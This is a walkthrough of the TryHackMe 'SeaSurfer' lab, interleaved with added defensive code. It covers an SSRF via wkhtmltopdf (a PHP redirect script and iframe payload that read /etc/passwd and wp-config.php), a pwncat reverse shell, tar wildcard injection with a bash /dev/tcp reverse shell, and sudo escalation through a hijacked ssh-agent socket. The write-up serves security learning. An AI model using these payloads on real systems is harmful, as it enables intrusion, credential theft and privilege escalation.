[THM] : SeaSurfer Walkthrough

Suvam Adhikari
6 min read · Jan 27, 2023

Initial Recon:

# Nmap 7.92 scan initiated Fri Jan 27 09:26:09 2023 as: nmap -A -p - -T4 -v -oN init.txt 10.10.48.220
Nmap scan report for 10.10.48.220
Host is up (0.43s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 87:e3:d4:32:cd:51:d2:96:70:ef:5f:48:22:50:ab:67 (RSA)
| 256 27:d1:37:b0:c5:3c:b5:81:6a:7c:36:8a:2b:63:9a:b9 (ECDSA)
|_ 256 7f:13:1b:cf:e6:45:51:b9:09:43:9a:23:2f:50:3c:94 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Uptime guess: 14.339 days (since Fri Jan 13 01:22:22 2023)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 170.11 ms 10.4.0.1
2 ... 3
4 428.18 ms 10.10.48.220

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 27 09:30:54 2023 -- 1 IP address (1 host up) scanned in 285.58 seconds

We can see that ports 22 and 80 are open. I intercepted the request in Burp, found a virtual host name in a response header, and added it to my /etc/hosts file.

I ran directory enumeration against the discovered virtual host and found an /adminer directory.

While browsing the website, I discovered another virtual host, intrenal.seasurfer.thm, which looked like a typo for internal.seasurfer.thm. I added that host to my /etc/hosts file and got an internal dashboard.

The application let users generate a PDF file by entering some values. I tried injecting some HTML and found that the input was rendered unescaped.

<script>document.write('test')</script>

I tried reading the /etc/passwd file directly, but that didn't work. I downloaded the generated PDF, inspected its metadata, and identified the application that produced it.

exiftool 27012023-Wp17CyDi97WTA9oWNHwp.pdf
ExifTool Version Number : 12.16
File Name : 27012023-Wp17CyDi97WTA9oWNHwp.pdf
Directory : .
File Size : 52 KiB
File Modification Date/Time : 2023:01:27 09:49:44+05:45
File Access Date/Time : 2023:01:27 09:49:44+05:45
File Inode Change Date/Time : 2023:01:27 09:49:44+05:45
File Permissions : rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Title : Receipt
Creator : wkhtmltopdf 0.12.5
Producer : Qt 4.8.7
Create Date : 2023:01:27 04:13:54Z
Page Count : 1

Upon researching, I found that wkhtmltopdf 0.12.5 was vulnerable to SSRF. I came across this article and hosted a PHP script with the following content.

<?php
// Redirect target for the PDF renderer; defaults to localhost
$loc = "http://127.0.0.1/";

// Any value passed as ?a= overrides the target
if (isset($_GET['a'])) {
    $loc = $_GET['a'];
}
header('Location: ' . $loc);
?>

The payload submitted to the PDF form then pointed an iframe at that script:

<iframe height=800px width=500px src="http://10.4.13.245:2224/lfi.php?a=file:///etc/passwd"></iframe>

Then I fetched the wp-config.php file, which was located in /var/www/wordpress.
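As an added example, not code from the walkthrough or from the SeaSurfer application: a defender-side fix for the receipt generator described above. The values a user submits are HTML-escaped before they reach the template, so the script and iframe payloads shown above end up as inert text instead of being rendered, and the renderer is invoked with local file access and JavaScript disabled. The template fields and the function names are assumptions.

```shell
#!/bin/bash
# Added example (not from the walkthrough): escape user input before it reaches
# the HTML that wkhtmltopdf renders. The template fields are assumptions.

# HTML-escape one value. '&' is replaced first so the later replacements are
# not double-encoded. Output has no trailing newline.
html_escape() {
    printf '%s' "$1" | sed -e 's/&/\&amp;/g' \
                           -e 's/</\&lt;/g' \
                           -e 's/>/\&gt;/g' \
                           -e 's/"/\&quot;/g' \
                           -e "s/'/\&#39;/g"
}

# Build the receipt HTML from escaped fields. An injected <iframe> or <script>
# survives only as text, so the renderer never fetches an attacker-chosen URL.
build_receipt_html() {
    local customer item amount
    customer=$(html_escape "$1")
    item=$(html_escape "$2")
    amount=$(html_escape "$3")
    printf '<html><body><h1>Receipt</h1>'
    printf '<p>Customer: %s</p><p>Item: %s</p><p>Amount: %s</p>' \
        "$customer" "$item" "$amount"
    printf '</body></html>\n'
}

# Render HTML from stdin to OUT with local file access and JavaScript disabled.
# Assumes wkhtmltopdf 0.12.6 or later, which disables local file access by
# default; the flags are passed explicitly so the intent is visible in the code.
render_receipt_pdf() {
    local out="$1"
    wkhtmltopdf --disable-local-file-access --disable-javascript - "$out"
}
```

Upgrading the renderer matters as much as the escaping: 0.12.5 is the version the PDF metadata revealed, and that is the version the SSRF article targets.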

The file contained the database username and password. I tried logging in through the /adminer directory found earlier and succeeded.

The database contained the hashed password of the WordPress user kyle.

I cracked the hash with hashcat, logged in to WordPress as kyle, and got a reverse shell.

pwncat -l <port> --self-inject /bin/sh:<attackerip>:<port>

The /var/www/internal directory contained a script, backup.sh.

$ cat backup.sh
#!/bin/bash

# Brandon complained about losing _one_ receipt when we had 5 minutes of downtime, set this to run every minute now >:D
# Still need to come up with a better backup system, perhaps a cloud provider?

cd /var/www/internal/invoices
tar -zcf /home/kyle/backups/invoices.tgz *

The script backs up /var/www/internal/invoices into the file invoices.tgz. This script is vulnerable to tar wildcard injection.

To understand wildcard injection, create two files, "test.txt" and "--help", and run "cat --help". Instead of printing the content of the file named --help, cat shows its own help text, because the file name is parsed as an option. The same happens with tar. If we instead run "cat -- --help", the "--" ends option parsing and cat reads the content of the file --help.

tar -zcf /home/kyle/backups/invoices.tgz *

Because the shell expands * into the names of the files in that directory, and tar treats names that begin with -- as options, the command effectively becomes the following.

tar -zcf /home/kyle/backups/invoices.tgz --checkpoint=1 --checkpoint-action=exec=id>test.txt

For the above command to run, we create two files named "--checkpoint=1" and "--checkpoint-action=exec=id>test.txt". When tar executes, it hits the first checkpoint and runs the id command, writing its output to test.txt. Since the wildcard is present in the tar command in backup.sh, the command executes as kyle.

To get a reverse shell as kyle, I created a file "shell.sh" and a file named "--checkpoint-action=exec=bash shell.sh".

Content of shell.sh

bash -c "bash -i >& /dev/tcp/10.4.13.245/5555 0>&1"
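As an added example, not code from the walkthrough: the backup.sh shown above rewritten so file names can never become tar options, plus a check that flags option-looking names in a directory, which is the artifact a defender would look for after this kind of abuse. Paths are parameters so the functions run on a constructed directory.

```shell
#!/bin/bash
# Added example (not from the walkthrough): a backup.sh that cannot be hijacked
# through file names, plus a check for option-looking names. Paths are
# parameters so the demo runs on a constructed directory.

# Archive SRC_DIR into ARCHIVE without expanding '*' in the shell. tar gets the
# directory via -C and a single operand ".", so a file called "--checkpoint=1"
# is stored as "./--checkpoint=1" and is never parsed as an option.
safe_backup() {
    local src_dir="$1" archive="$2"
    tar -zcf "$archive" -C "$src_dir" -- .
}

# Print entries directly under DIR whose names begin with '-'. Return 1 when
# any exist (a planted option file in a directory fed to a wildcard command is
# a useful detection signal), 0 otherwise.
find_option_like_names() {
    local hits
    hits=$(find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print)
    [ -n "$hits" ] || return 0
    printf '%s\n' "$hits"
    return 1
}
```

The cron job should also write the archive to a directory the web user cannot write to; backup.sh as shown lets www-data plant files in the directory that root-equivalent tar reads.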

After getting a reverse shell as kyle, I stabilized access by generating a key pair with ssh-keygen and adding my public key to /home/kyle/.ssh/authorized_keys.

chmod 600 id_rsa
ssh -i id_rsa kyle@10.10.94.172

I downloaded linpeas.sh, checked for interesting findings, and found /etc/pam.d/sudo.

#%PAM-1.0

auth sufficient pam_ssh_agent_auth.so file=/etc/ssh/sudo_authorized_keys

session required pam_env.so readenv=1 user_readenv=0
session required pam_env.so readenv=1 envfile=/etc/default/locale user_readenv=0
@include common-auth
@include common-account
@include common-session-noninteractive

The sudo PAM stack accepts authentication through an ssh-agent (pam_ssh_agent_auth), and we can see that kyle has SSHed into the machine and run a sudo command.

We now set the environment variable SSH_AUTH_SOCK to the socket of a running ssh-agent, the program that holds private keys for public-key authentication. The agent sockets of forwarded ssh sessions are visible under the /tmp directory.

export SSH_AUTH_SOCK=/tmp/ssh-A3uEXRGibW/agent.1149

With SSH_AUTH_SOCK pointing at that socket, ssh-add -l lists the keys the agent holds; when kyle's key is there, sudo authenticates through the forwarded agent via pam_ssh_agent_auth and lets the session run commands with superuser privileges.

ssh-add -l
